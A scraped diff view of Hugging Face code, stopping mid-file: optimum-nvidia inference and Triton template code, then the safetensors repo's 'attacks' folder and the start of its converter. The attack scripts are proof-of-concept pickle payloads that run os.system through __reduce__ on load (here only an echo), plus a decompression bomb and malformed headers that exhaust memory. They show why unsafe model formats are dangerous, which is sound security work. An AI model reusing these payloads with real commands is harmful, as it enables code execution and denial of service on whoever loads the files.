+ if return_tensors is not None and return_type is None:
967
+ if return_text is not None:
968
+ raise ValueError('`return_text` is mutually exclusive with `return_tensors`')
969
+ return_type = ReturnType.TENSORS
970
+ if return_type is not None:
971
+ postprocess_params['return_type'] = return_type
972
+ if clean_up_tokenization_spaces is not None:
973
+ postprocess_params['clean_up_tokenization_spaces'] = clean_up_tokenization_spaces
974
+ if stop_sequence is not None:
975
+ stop_sequence_ids = self.tokenizer.encode(stop_sequence, add_special_tokens=False)
976
+ if len(stop_sequence_ids) > 1:
977
+ warnings.warn('Stopping on a multiple token sequence is not yet supported on transformers. The first token of the stop sequence will be used as the stop sequence string in the interim.')
978
+ generate_kwargs['eos_token_id'] = stop_sequence_ids[0]
979
+ return (preprocess_params, forward_params, postprocess_params)
980
+
981
+ def _forward(self, model_inputs, **generate_kwargs):
982
+ input_ids = model_inputs['input_ids']
983
+ prompt_text = model_inputs.pop('prompt_text')
984
+ attention_mask = model_inputs.get('attention_mask', None)
985
+ max_new_tokens = generate_kwargs.pop('max_new_tokens', None)
986
+ min_length = generate_kwargs.pop('min_length', -1)
987
+ num_beams = generate_kwargs.pop('num_beams', 1)
988
+ temperature = generate_kwargs.pop('temperature', 1.0)
989
+ top_k = generate_kwargs.pop('top_k', 50)
990
+ top_p = generate_kwargs.pop('top_p', 1.0)
991
+ repetition_penalty = generate_kwargs.pop('repetition_penalty', 1.0)
992
+ length_penalty = generate_kwargs.pop('length_penalty', 1.0)
993
+ seed = generate_kwargs.pop('seed', 2017)
994
+ (generated_sequence, lengths) = self._runtime.generate(input_ids=input_ids, attention_mask=attention_mask, max_new_tokens=max_new_tokens, min_length=min_length, num_beams=num_beams, temperature=temperature, top_k=top_k, top_p=top_p, repetition_penalty=repetition_penalty, length_penalty=length_penalty, seed=seed)
995
+ return {'generated_sequence': generated_sequence, 'lengths': lengths, 'input_ids': input_ids, 'prompt_text': prompt_text}
996
+
997
+ def preprocess(self, prompt_text, prefix='', handle_long_generation=None, add_special_tokens=False, **generate_kwargs) -> Dict[str, torch.Tensor]:
998
+ if isinstance(prompt_text, List):
999
+ text = [prefix + prompt for prompt in prompt_text]
1000
+ else:
1001
+ text = prefix + prompt_text
1002
+ inputs = self.tokenizer(text, padding=False, add_special_tokens=add_special_tokens, return_tensors=TensorType.PYTORCH)
1003
+ inputs['prompt_text'] = prompt_text
1004
+ return inputs
1005
+
1006
+ def postprocess(self, model_outputs, return_type=ReturnType.FULL_TEXT, clean_up_tokenization_spaces=True):
1007
+ generated_sequence = model_outputs['generated_sequence']
1008
+ generated_sequence = generated_sequence.cpu().numpy().tolist()
1009
+ records = []
1010
+ if return_type == ReturnType.TENSORS:
1011
+ return [{'generated_token_ids': generated for generated in generated_sequence}]
1012
+ for sequence in generated_sequence:
1013
+ text = self.tokenizer.decode(sequence, skip_special_tokens=True, clean_up_tokenization_spaces=clean_up_tokenization_spaces)
1014
+ record = {'generated_text': text}
1015
+ records.append(record)
1016
+ return records
1017
+
1018
+ # File: optimum-nvidia-main/src/optimum/nvidia/runtime.py
1019
+ import asyncio
1020
+ import json
1021
+ import math
1022
+ from logging import getLogger
1023
+ from os import PathLike
1024
+ from pathlib import Path
1025
+ from typing import TYPE_CHECKING, Any, Dict, List, Optional, Sequence, Union
1026
+ import torch
1027
+ from tensorrt_llm.bindings.executor import ExecutorConfig, KvCacheConfig
1028
+ from tensorrt_llm.executor import GenerationExecutor, GenerationRequest, GenerationResult
1029
+ from tensorrt_llm.hlapi import SamplingParams
1030
+ from optimum.nvidia.hub import HuggingFaceHubModel
1031
+ from optimum.nvidia.utils.nvml import is_post_ampere
1032
+ if TYPE_CHECKING:
1033
+ from transformers import GenerationConfig
1034
+ LOGGER = getLogger(__name__)
1035
+
1036
+ def read_engine_config_file(path: Path) -> Dict[str, Any]:
1037
+ with open(path / 'config.json', 'r', encoding='utf-8') as config_f:
1038
+ return json.load(config_f)
1039
+
1040
+ def convert_generation_config(config: 'GenerationConfig') -> 'SamplingParams':
1041
+ return SamplingParams(end_id=config.eos_token_id, pad_id=config.pad_token_id, top_k=config.top_k if config.do_sample else 1, top_p=config.top_p, temperature=config.temperature, beam_width=config.num_beams if config.do_sample else 1, bad_token_ids=config.bad_words_ids, length_penalty=config.length_penalty, repetition_penalty=config.repetition_penalty, no_repeat_ngram_size=config.no_repeat_ngram_size if config.no_repeat_ngram_size > 0 else 1, min_length=config.min_length if config.min_length > 0 else 1, max_new_tokens=config.max_new_tokens, return_generation_logits=config.output_logits, return_log_probs=not config.renormalize_logits)
1042
+
1043
+ def default_executor_config(config: Dict[str, Any]) -> 'ExecutorConfig':
1044
+ build_config = config['build_config']
1045
+ plugin_config = config['build_config']['plugin_config']
1046
+ max_blocks_per_sequence = math.floor(build_config['max_seq_len'] / plugin_config['tokens_per_block'])
1047
+ return ExecutorConfig(enable_chunked_context=is_post_ampere(), kv_cache_config=KvCacheConfig(enable_block_reuse=True, max_tokens=build_config['max_beam_width'] * plugin_config['tokens_per_block'] * max_blocks_per_sequence))
1048
+
1049
+ class InferenceRuntimeBase:
1050
+ __slots__ = ('_config', '_executor', '_generation_config', '_sampling_config')
1051
+
1052
+ def __init__(self, engines_path: Union[str, PathLike], generation_config: 'GenerationConfig', executor_config: Optional['ExecutorConfig']=None, load_engines: bool=True):
1053
+ engines_path = Path(engines_path)
1054
+ if not engines_path.exists():
1055
+ raise OSError(f"engine folder {engines_path} doesn't exist")
1056
+ self._config = read_engine_config_file(engines_path)
1057
+ self._generation_config = generation_config
1058
+ self._sampling_config = convert_generation_config(generation_config)
1059
+ if load_engines:
1060
+ self._executor = GenerationExecutor.create(engine=engines_path, executor_config=executor_config or default_executor_config(self._config))
1061
+
1062
+ def generate(self, inputs: Union[List[int], 'torch.IntTensor'], generation_config: Optional['GenerationConfig']=None):
1063
+ sampling = convert_generation_config(generation_config) if generation_config else self._sampling_config
1064
+ if isinstance(inputs, torch.Tensor):
1065
+ inputs = inputs.tolist()
1066
+ result = self._executor.generate(inputs, sampling_params=sampling)
1067
+ return result[0].outputs[0].token_ids
1068
+
1069
+ async def agenerate(self, inputs: Union[List[int], 'torch.IntTensor'], generation_config: Optional['GenerationConfig']=None) -> List[int]:
1070
+ sampling = convert_generation_config(generation_config) if generation_config else self._sampling_config
1071
+ if isinstance(inputs, torch.Tensor):
1072
+ inputs = inputs.tolist()
1073
+ futures = self._executor.generate_async(inputs, streaming=False, sampling_params=sampling)
1074
+ if isinstance(futures, GenerationRequest):
1075
+ results = await futures.aresult()
1076
+ return results.token_ids
1077
+ else:
1078
+ results = await asyncio.gather(*[f.aresult() for f in futures])
1079
+ return [r.token_ids for r in results]
1080
+
1081
+ class CausalLMOutput:
1082
+ __slots__ = ('_results',)
1083
+
1084
+ def __init__(self, results: Union['GenerationResult', Sequence['GenerationResult']]):
1085
+ self._results = results
1086
+
1087
+ @property
1088
+ def logits(self):
1089
+ return self._results.token_ids
1090
+
1091
+ @property
1092
+ def loss(self) -> None:
1093
+ return None
1094
+
1095
+ class CausalLM(HuggingFaceHubModel, InferenceRuntimeBase):
1096
+
1097
+ def __init__(self, engines_path: Union[str, PathLike, Path], generation_config: 'GenerationConfig', executor_config: Optional['ExecutorConfig']=None, load_engines: bool=True):
1098
+ InferenceRuntimeBase.__init__(self, engines_path, generation_config, executor_config, load_engines)
1099
+ HuggingFaceHubModel.__init__(self, engines_path)
1100
+
1101
+ def _save_additional_parcels(self, save_directory: Path):
1102
+ self._generation_config.save_pretrained(save_directory, 'generation_config.json')
1103
+
1104
+ # File: optimum-nvidia-main/src/optimum/nvidia/subpackage/commands/export.py
1105
+ import sys
1106
+ from typing import TYPE_CHECKING, Optional, Union
1107
+ from transformers import AutoConfig, AutoTokenizer
1108
+ from optimum.commands import optimum_cli_subcommand
1109
+ from optimum.commands.base import BaseOptimumCLICommand, CommandInfo
1110
+ from optimum.commands.export.base import ExportCommand
1111
+ from optimum.nvidia import AutoModelForCausalLM, ExportConfig
1112
+ from optimum.nvidia.export.cli import common_trtllm_export_args
1113
+ if TYPE_CHECKING:
1114
+ from argparse import ArgumentParser, Namespace, _SubParsersAction
1115
+ from pathlib import Path
1116
+ OPTIMUM_NVIDIA_CLI_QUANTIZATION_TARGET_REF = 'TARGET_QUANTIZATION_RECIPE'
1117
+
1118
+ def import_source_file(fname: Union[str, 'Path'], modname: str):
1119
+ import importlib.util
1120
+ spec = importlib.util.spec_from_file_location(modname, fname)
1121
+ module = importlib.util.module_from_spec(spec)
1122
+ sys.modules[modname] = module
1123
+ spec.loader.exec_module(module)
1124
+
1125
+ @optimum_cli_subcommand(ExportCommand)
1126
+ class TrtLlmExportCommand(BaseOptimumCLICommand):
1127
+ COMMAND = CommandInfo(name='trtllm', help='Export PyTorch models to TensorRT-LLM compiled engines')
1128
+
1129
+ def __init__(self, subparsers: '_SubParsersAction', args: Optional['Namespace']=None, command: Optional['CommandInfo']=None, from_defaults_factory: bool=False, parser: Optional['ArgumentParser']=None):
1130
+ super().__init__(subparsers, args=args, command=command, from_defaults_factory=from_defaults_factory, parser=parser)
1131
+ self.args_string = ' '.join(sys.argv[3:])
1132
+
1133
+ @staticmethod
1134
+ def parse_args(parser: 'ArgumentParser'):
1135
+ return common_trtllm_export_args(parser)
1136
+
1137
+ def run(self):
1138
+ args = self.args
1139
+ if args.quantization:
1140
+ tokenizer = AutoTokenizer.from_pretrained(args.model)
1141
+ import_source_file(args.quantization, 'recipe')
1142
+ try:
1143
+ from recipe import TARGET_QUANTIZATION_RECIPE
1144
+ qconfig = TARGET_QUANTIZATION_RECIPE(tokenizer)
1145
+ except ImportError:
1146
+ raise ModuleNotFoundError(f"Global variable 'TARGET_QUANTIZATION_RECIPE' was not found in {args.quantization}. This is required to automatically detect and allocate the right recipe for quantization.")
1147
+ else:
1148
+ qconfig = None
1149
+ config = AutoConfig.from_pretrained(args.model)
1150
+ export = ExportConfig.from_config(config, args.max_batch_size)
1151
+ model = AutoModelForCausalLM.from_pretrained(args.model, export_config=export, quantization_config=qconfig, export_only=True, force_export=True)
1152
+ if args.destination:
1153
+ model.save_pretrained(args.destination)
1154
+ if args.push_to_hub:
1155
+ print(f'Exporting model to the Hugging Face Hub: {args.push_to_hub}')
1156
+ model.push_to_hub(args.push_to_hub, commit_message=f'Optimum-CLI TensorRT-LLM {args.model} export')
1157
+
1158
+ # File: optimum-nvidia-main/templates/inference-endpoints/postprocessing/1/model.py
1159
+ import json
1160
+ import numpy as np
1161
+ import triton_python_backend_utils as pb_utils
1162
+ from transformers import AutoTokenizer, LlamaTokenizer, T5Tokenizer
1163
+
1164
+ class TritonPythonModel:
1165
+ __slots__ = ('tokenizer', 'output_dtype')
1166
+
1167
+ def initialize(self, args):
1168
+ model_config = json.loads(args['model_config'])
1169
+ tokenizer_dir = model_config['parameters']['tokenizer_dir']['string_value']
1170
+ self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_dir, padding_side='left')
1171
+ self.tokenizer.pad_token = self.tokenizer.eos_token
1172
+ output_config = pb_utils.get_output_config_by_name(model_config, 'OUTPUT')
1173
+ self.output_dtype = pb_utils.triton_string_to_numpy(output_config['data_type'])
1174
+
1175
+ def execute(self, requests):
1176
+ responses = []
1177
+ for (idx, request) in enumerate(requests):
1178
+ tokens_batch = pb_utils.get_input_tensor_by_name(request, 'TOKENS_BATCH').as_numpy()
1179
+ outputs = self._postprocessing(tokens_batch)
1180
+ output_tensor = pb_utils.Tensor('OUTPUT', np.array(outputs).astype(self.output_dtype))
1181
+ inference_response = pb_utils.InferenceResponse(output_tensors=[output_tensor])
1182
+ responses.append(inference_response)
1183
+ return responses
1184
+
1185
+ def finalize(self):
1186
+ print('Cleaning up...')
1187
+
1188
+ def _postprocessing(self, tokens_batch):
1189
+ outputs = []
1190
+ for beam_tokens in tokens_batch:
1191
+ for tokens in beam_tokens:
1192
+ output = self.tokenizer.decode(tokens)
1193
+ outputs.append(output.encode('utf8'))
1194
+ return outputs
1195
+
1196
+ # File: optimum-nvidia-main/templates/inference-endpoints/preprocessing/1/model.py
1197
+ import csv
1198
+ import json
1199
+ from pathlib import Path
1200
+ from typing import List, Sequence
1201
+ import numpy as np
1202
+ import triton_python_backend_utils as pb_utils
1203
+ from tokenizers import Tokenizer
1204
+ INPUT_NAMES = {'INPUT_ID', 'REQUEST_INPUT_LEN', 'BAD_WORDS_IDS', 'STOP_WORDS_IDS'}
1205
+
1206
+ class TritonPythonModel:
1207
+ __slots__ = ('tokenizer', 'pad_token', 'pad_token_id', 'input_id_dtype', 'request_input_len_dtype', 'bad_words_ids_dtype', 'stop_words_ids_dtype')
1208
+
1209
+ def initialize(self, args):
1210
+ model_config = json.loads(args['model_config'])
1211
+ tokenizer_dir = Path(model_config['parameters']['tokenizer_dir']['string_value'])
1212
+ tokenizer_path = tokenizer_dir.joinpath('tokenizer.json')
1213
+ pad_to_multiple_of = int(model_config['parameters']['pad_to_multiple_of']['string_value'])
1214
+ special_tokens_map_path = tokenizer_dir.joinpath('special_tokens_map.json')
1215
+ with open(special_tokens_map_path, 'r', encoding='utf-8') as special_tokens_f:
1216
+ special_tokens_map = json.load(special_tokens_f)
1217
+ self.tokenizer = Tokenizer.from_file(str(tokenizer_path))
1218
+ if 'eos_token' in special_tokens_map:
1219
+ eos_token = special_tokens_map['eos_token']['content']
1220
+ eos_token_id = self.tokenizer.encode(eos_token, add_special_tokens=False).ids[0]
1221
+ self.pad_token = eos_token
1222
+ self.pad_token_id = eos_token_id
1223
+ for name in INPUT_NAMES:
1224
+ dtype = pb_utils.triton_string_to_numpy(pb_utils.get_output_config_by_name(model_config, name)['data_type'])
1225
+ setattr(self, name.lower() + '_dtype', dtype)
1226
+
1227
+ def execute(self, requests: Sequence):
1228
+ responses = []
1229
+ for request in requests:
1230
+ response = self.handle_request(request)
1231
+ responses.append(response)
1232
+ return responses
1233
+
1234
+ def finalize(self):
1235
+ print('Cleaning up...')
1236
+
1237
+ def handle_request(self, request: Sequence):
1238
+ query = pb_utils.get_input_tensor_by_name(request, 'QUERY').as_numpy().item().decode('utf-8')
1239
+ request_output_len = pb_utils.get_input_tensor_by_name(request, 'REQUEST_OUTPUT_LEN')
1240
+ encoding = self.tokenizer.encode(query)
1241
+ bad_words_ids = pb_utils.Tensor('BAD_WORDS_IDS', np.array([[], []], dtype=self.bad_words_ids_dtype))
1242
+ stop_words_ids = pb_utils.Tensor('STOP_WORDS_IDS', np.array([[], []], dtype=self.stop_words_ids_dtype))
1243
+ input_ids = pb_utils.Tensor('INPUT_ID', np.array([encoding.ids], dtype=self.input_id_dtype))
1244
+ request_input_len = pb_utils.Tensor('REQUEST_INPUT_LEN', np.array([[len(encoding.ids)]], dtype=self.request_input_len_dtype))
1245
+ return pb_utils.InferenceResponse(output_tensors=[input_ids, bad_words_ids, stop_words_ids, request_input_len, request_output_len])
1246
+
1247
+ def _to_word_list_format(self, word_dict: List[List[str]]):
1248
+ assert self.tokenizer != None, 'need to set tokenizer'
1249
+ flat_ids = []
1250
+ offsets = []
1251
+ for word_dict_item in word_dict:
1252
+ item_flat_ids = []
1253
+ item_offsets = []
1254
+ if isinstance(word_dict_item[0], bytes):
1255
+ word_dict_item = [word_dict_item[0].decode()]
1256
+ words = list(csv.reader(word_dict_item))[0]
1257
+ for word in words:
1258
+ ids = self.tokenizer.encode(word)
1259
+ if len(ids) == 0:
1260
+ continue
1261
+ item_flat_ids += ids
1262
+ item_offsets.append(len(ids))
1263
+ flat_ids.append(np.array(item_flat_ids))
1264
+ offsets.append(np.cumsum(np.array(item_offsets)))
1265
+ pad_to = max(1, max((len(ids) for ids in flat_ids)))
1266
+ for (i, (ids, offs)) in enumerate(zip(flat_ids, offsets)):
1267
+ flat_ids[i] = np.pad(ids, (0, pad_to - len(ids)), constant_values=0)
1268
+ offsets[i] = np.pad(offs, (0, pad_to - len(offs)), constant_values=-1)
1269
+ return np.array([flat_ids, offsets], dtype='int32').transpose((1, 0, 2))
1270
+
huggingface_optimum-quanto.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_optimum.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_peft.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_pixparse.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_pytorch-image-models.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_safetensors.txt ADDED
@@ -0,0 +1,1038 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: safetensors-main/attacks/numpy_dos_get_pwned.py
2
+ import os
3
+ import numpy as np
4
+ filename = 'numpy_dos.npz'
5
+ print(f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine.")
6
+ print('Be careful this might crash your computer by reserving way too much RAM')
7
+ input('Press Enter to continue')
8
+ archive = np.load(filename)
9
+ weights = archive['weight']
10
+ assert np.allclose(weights, np.zeros((2, 2)))
11
+ print('The file looks fine !')
12
+
13
+ # File: safetensors-main/attacks/paddle_ace_create.py
14
+ import paddle
15
+ import numpy as np
16
+ from collections import Iterable, OrderedDict
17
+
18
+ def _parse_every_object(obj, condition_func, convert_func):
19
+ if condition_func(obj):
20
+ return convert_func(obj)
21
+ elif isinstance(obj, (dict, OrderedDict, list)):
22
+ if isinstance(obj, list):
23
+ keys = range(len(obj))
24
+ else:
25
+ keys = list(obj.keys())
26
+ for key in keys:
27
+ if condition_func(obj[key]):
28
+ obj[key] = convert_func(obj[key])
29
+ else:
30
+ obj[key] = _parse_every_object(obj[key], condition_func, convert_func)
31
+ return obj
32
+ elif isinstance(obj, tuple):
33
+ return tuple(_parse_every_object(list(obj), condition_func, convert_func))
34
+ elif isinstance(obj, set):
35
+ object(list(obj), condition_func, convert_func)
36
+ else:
37
+ return obj
38
+ paddle.framework.io._parse_every_object = _parse_every_object
39
+
40
+ class BadDict(dict):
41
+
42
+ def __init__(self, src: str, **kwargs):
43
+ super().__init__(**kwargs)
44
+ self.src = src
45
+
46
+ def __reduce__(self):
47
+ return (eval, (f"os.system('{self.src}') or dict()",), None, None, iter(self.items()))
48
+ paddle.save([BadDict('echo "pwned your computer, I can do anything I want."', **{'weight': paddle.zeros((2, 2))})], 'paddle_ace.pdparams')
49
+
50
+ # File: safetensors-main/attacks/safetensors_abuse_attempt_1.py
51
+ import torch
52
+ from safetensors.torch import load_file, save_file
53
+ filename = 'safetensors_abuse_attempt_1.safetensors'
54
+
55
+ def create_payload():
56
+ weights = {'weight': torch.zeros((2, 2))}
57
+ save_file(weights, filename)
58
+ with open(filename, 'r+b') as f:
59
+ f.seek(0)
60
+ n = 1000
61
+ n_bytes = n.to_bytes(8, 'little')
62
+ f.write(n_bytes)
63
+ create_payload()
64
+ test = load_file(filename)
65
+
66
+ # File: safetensors-main/attacks/safetensors_abuse_attempt_2.py
67
+ import datetime
68
+ import json
69
+ import os
70
+ from safetensors.torch import load_file
71
+ filename = 'safetensors_abuse_attempt_2.safetensors'
72
+
73
+ def create_payload():
74
+ shape = [2, 2]
75
+ n = shape[0] * shape[1] * 4
76
+ metadata = {f'weight_{i}': {'dtype': 'F32', 'shape': shape, 'data_offsets': [0, n]} for i in range(1000 * 1000 * 10)}
77
+ binary = json.dumps(metadata).encode('utf-8')
78
+ n = len(binary)
79
+ n_header = n.to_bytes(8, 'little')
80
+ with open(filename, 'wb') as f:
81
+ f.write(n_header)
82
+ f.write(binary)
83
+ f.write(b'\x00' * n)
84
+ create_payload()
85
+ print(f'The file {filename} is {os.path.getsize(filename) / 1000 / 1000} Mo')
86
+ start = datetime.datetime.now()
87
+ test = load_file(filename)
88
+ print(f'Loading the file took {datetime.datetime.now() - start}')
89
+
90
+ # File: safetensors-main/attacks/safetensors_abuse_attempt_3.py
91
+ import datetime
92
+ import json
93
+ import os
94
+ from safetensors.torch import load_file
95
+ filename = 'safetensors_abuse_attempt_2.safetensors'
96
+
97
+ def create_payload():
98
+ shape = [200, 200]
99
+ n = shape[0] * shape[1] * 4
100
+ metadata = {f'weight_{i}': {'dtype': 'F32', 'shape': shape, 'data_offsets': [0, n]} for i in range(1000 * 100)}
101
+ binary = json.dumps(metadata).encode('utf-8')
102
+ n = len(binary)
103
+ n_header = n.to_bytes(8, 'little')
104
+ with open(filename, 'wb') as f:
105
+ f.write(n_header)
106
+ f.write(binary)
107
+ f.write(b'\x00' * n)
108
+ create_payload()
109
+ print(f'The file {filename} is {os.path.getsize(filename) / 1000 / 1000} Mo')
110
+ start = datetime.datetime.now()
111
+ test = load_file(filename)
112
+ print(f'Loading the file took {datetime.datetime.now() - start}')
113
+
114
+ # File: safetensors-main/attacks/tf_ace_get_pwned.py
115
+ import base64
116
+ import json
117
+ import h5py
118
+ import tensorflow as tf
119
+ new_model = tf.keras.models.load_model('tf.h5')
120
+ print('Transformers is not vulnerable to this, as it uses h5 directly.')
121
+ print('Keras uses a pickled code of the function within the `h5` attrs of the file')
122
+ print("Let's show you the marshalled code")
123
+ with h5py.File('tf_ace.h5') as f:
124
+ data = json.loads(f.attrs['model_config'])
125
+ print(base64.b64decode(data['config']['layers'][-1]['config']['function'][0]))
126
+ pass
127
+
128
+ # File: safetensors-main/attacks/torch_ace_create.py
129
+ import torch
130
+
131
+ class BadDict(dict):
132
+
133
+ def __init__(self, src: str, **kwargs):
134
+ super().__init__(**kwargs)
135
+ self.src = src
136
+
137
+ def __reduce__(self):
138
+ return (eval, (f"os.system('{self.src}') or dict()",), None, None, iter(self.items()))
139
+ torch.save(BadDict('echo "pwned your computer, I can do anything I want."', **{'weight': torch.zeros((2, 2))}), 'torch_ace.pt')
140
+
141
+ # File: safetensors-main/attacks/torch_dos_create.py
142
+ import os
143
+ from zipfile import ZIP_DEFLATED, ZipFile
144
+ import torch
145
+ FILESIZE = 40 * 1000
146
+ BUFFER = b'\x00' * 1000 * 1000
147
+ filename = 'torch_dos_tmp.pt'
148
+ torch.save({'weight': torch.zeros((2, 2))}, filename)
149
+ with ZipFile(filename, 'r') as torch_zip:
150
+ outfilename = 'torch_dos.pt'
151
+ with ZipFile(outfilename, 'w', compression=ZIP_DEFLATED) as outzip:
152
+ outzip.writestr('archive/data.pkl', torch_zip.open('archive/data.pkl').read())
153
+ outzip.writestr('archive/version', torch_zip.open('archive/version').read())
154
+ with outzip.open('archive/data/0', 'w', force_zip64=True) as f:
155
+ for i in range(FILESIZE):
156
+ f.write(BUFFER)
157
+ os.remove(filename)
158
+
159
+ # File: safetensors-main/attacks/torch_dos_get_pwned.py
160
+ import os
161
+ import torch
162
+ filename = 'torch_dos.pt'
163
+ print(f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine.")
164
+ print('Be careful this might crash your computer by reserving way too much RAM')
165
+ input('Press Enter to continue')
166
+ weights = torch.load(filename)
167
+ assert list(weights.keys()) == ['weight']
168
+ assert torch.allclose(weights['weight'], torch.zeros((2, 2)))
169
+ print('The file looks fine !')
170
+
171
+ # File: safetensors-main/bindings/python/convert.py
172
+ import argparse
173
+ import json
174
+ import os
175
+ import shutil
176
+ from collections import defaultdict
177
+ from tempfile import TemporaryDirectory
178
+ from typing import Dict, List, Optional, Set, Tuple
179
+ import torch
180
+ from huggingface_hub import CommitInfo, CommitOperationAdd, Discussion, HfApi, hf_hub_download
181
+ from huggingface_hub.file_download import repo_folder_name
182
+ from safetensors.torch import _find_shared_tensors, _is_complete, load_file, save_file
183
+ COMMIT_DESCRIPTION = '\nThis is an automated PR created with https://huggingface.co/spaces/safetensors/convert\n\nThis new file is equivalent to `pytorch_model.bin` but safe in the sense that\nno arbitrary code can be put into it.\n\nThese files also happen to load much faster than their pytorch counterpart:\nhttps://colab.research.google.com/github/huggingface/notebooks/blob/main/safetensors_doc/en/speed.ipynb\n\nThe widgets on your model page will run using this model even if this is not merged\nmaking sure the file actually works.\n\nIf you find any issues: please report here: https://huggingface.co/spaces/safetensors/convert/discussions\n\nFeel free to ignore this PR.\n'
184
+ ConversionResult = Tuple[List['CommitOperationAdd'], List[Tuple[str, 'Exception']]]
185
+
186
+ def _remove_duplicate_names(state_dict: Dict[str, torch.Tensor], *, preferred_names: List[str]=None, discard_names: List[str]=None) -> Dict[str, List[str]]:
187
+ if preferred_names is None:
188
+ preferred_names = []
189
+ preferred_names = set(preferred_names)
190
+ if discard_names is None:
191
+ discard_names = []
192
+ discard_names = set(discard_names)
193
+ shareds = _find_shared_tensors(state_dict)
194
+ to_remove = defaultdict(list)
195
+ for shared in shareds:
196
+ complete_names = set([name for name in shared if _is_complete(state_dict[name])])
197
+ if not complete_names:
198
+ if len(shared) == 1:
199
+ name = list(shared)[0]
200
+ state_dict[name] = state_dict[name].clone()
201
+ complete_names = {name}
202
+ else:
203
+ raise RuntimeError(f'Error while trying to find names to remove to save state dict, but found no suitable name to keep for saving amongst: {shared}. None is covering the entire storage.Refusing to save/load the model since you could be storing much more memory than needed. Please refer to https://huggingface.co/docs/safetensors/torch_shared_tensors for more information. Or open an issue.')
204
+ keep_name = sorted(list(complete_names))[0]
205
+ preferred = complete_names.difference(discard_names)
206
+ if preferred:
207
+ keep_name = sorted(list(preferred))[0]
208
+ if preferred_names:
209
+ preferred = preferred_names.intersection(complete_names)
210
+ if preferred:
211
+ keep_name = sorted(list(preferred))[0]
212
+ for name in sorted(shared):
213
+ if name != keep_name:
214
+ to_remove[keep_name].append(name)
215
+ return to_remove
216
+
217
+ def get_discard_names(model_id: str, revision: Optional[str], folder: str, token: Optional[str]) -> List[str]:
218
+ try:
219
+ import json
220
+ import transformers
221
+ config_filename = hf_hub_download(model_id, revision=revision, filename='config.json', token=token, cache_dir=folder)
222
+ with open(config_filename, 'r') as f:
223
